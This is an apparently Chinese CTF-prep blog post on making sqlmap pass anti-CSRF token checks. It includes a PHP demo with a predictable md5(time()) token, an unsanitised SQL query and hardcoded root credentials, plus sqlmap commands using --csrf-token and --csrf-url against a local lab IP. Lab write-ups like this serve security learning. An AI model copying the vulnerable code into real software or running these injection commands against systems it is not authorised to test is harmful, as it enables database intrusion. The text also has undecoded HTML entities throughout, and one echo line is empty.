phpcsrf打MySQL_sqlmap绕过CSRF检测进行注入

最近在准备比赛&＃xff0c;打sqlilabs时看了一下sqlmap的wiki&＃xff0c;发现了–csrf-token和–csrf-url的参数&＃xff0c;于是写了个php版本的bug试了一试。

同时也了解了一下大家对csrf注入的普遍做法&＃xff1a;sqlmap&＃43;burp正则匹配&＃xff0c;两相比较&＃xff0c;还是sqlmap自带的功能比较方便。

写一个bug

CSRF的普遍防御方法是增加anti-csrf token&＃xff0c;也就是一串不可预测的字符串。于是动手写了一个php版本防csrf的sqli脚本&＃xff0c;这里写的并不规范&＃xff0c;时间戳是可以被预测的&＃xff0c;而且此脚本可以被绕过token检测&＃xff0c;有兴趣可以琢磨一下。

session_start();

//生成随机token

$token &＃61; md5(time());

//获取name参数

$name &＃61; isset($_GET[&＃39;name&＃39;]) ? $_GET[&＃39;name&＃39;]: &＃39;&＃39;;

//校验token

if ($_GET[&＃39;token&＃39;] &＃61;&＃61; $_SESSION[&＃39;token&＃39;]) {

//执行sql语句

$mysqli &＃61; new mysqli("127.0.0.1","root","root");

$mysqli->select_db("test");

if (!$mysqli->connect_error) {

$query &＃61; "select * from admin where username &＃61; &＃39;$name&＃39;";

$result &＃61; $mysqli->query($query);

if (!$mysqli->error) {

while ($row &＃61; $result->fetch_row()) {

echo $row;

}

} else {

echo $mysqli->error;

}

} else {

echo $mysqli->connect_error;

}

$mysqli->close();

} else {

echo "no token";

}

//以hidden表单元素的形式输出token

echo "";

//刷新SESSION中token

$_SESSION[&＃39;token&＃39;] &＃61; $token;

?>

漏洞利用

sqlmap 中有这样两个参数

–csrf-token&＃61;”token_name”&＃xff0c;指定随机化token的参数名

–csrf-url&＃61;”http://x.x.x.x/page”&＃xff0c;指定获取token值的地址

如果没有指定–csrf-url&＃xff0c;则默认从当前页面获取token。先来看看不指定token时&＃xff0c;sqlmap的输出&＃xff1a;

sqlmap -u "http://192.168.154.134/tokensql.php?name&＃61;admin&token&＃61;123" --flush-session

sqlmap根据关键字&＃xff0c;识别出了token参数&＃xff0c;但是默认不获取token&＃xff0c;没有发现注入点。

再来看看指定token时的输出&＃xff1a;

sqlmap -u "http://192.168.154.134/tokensql.php?name&＃61;admin&token&＃61;123" --flush-session --csrf-token&＃61;"token"

确认了注入的存在&＃xff0c;并且在wireshark中观察到token被sqlmap自动更新

在这个demo中&＃xff0c;获取token的页面和注入点相同&＃xff0c;在真实场景中&＃xff0c;可能需要单独获取token值&＃xff0c;这时要用到–csrf-url&＃61;的参数。

所以使用以下命令&＃xff0c;效果也是一样的&＃xff1a;

sqlmap -u "http://192.168.154.134/tokensql.php?name&＃61;admin&token&＃61;123" --flush-session --csrf-token&＃61;"token" --csrf-url&＃61;"http://192.168.154.134/tokensql.php"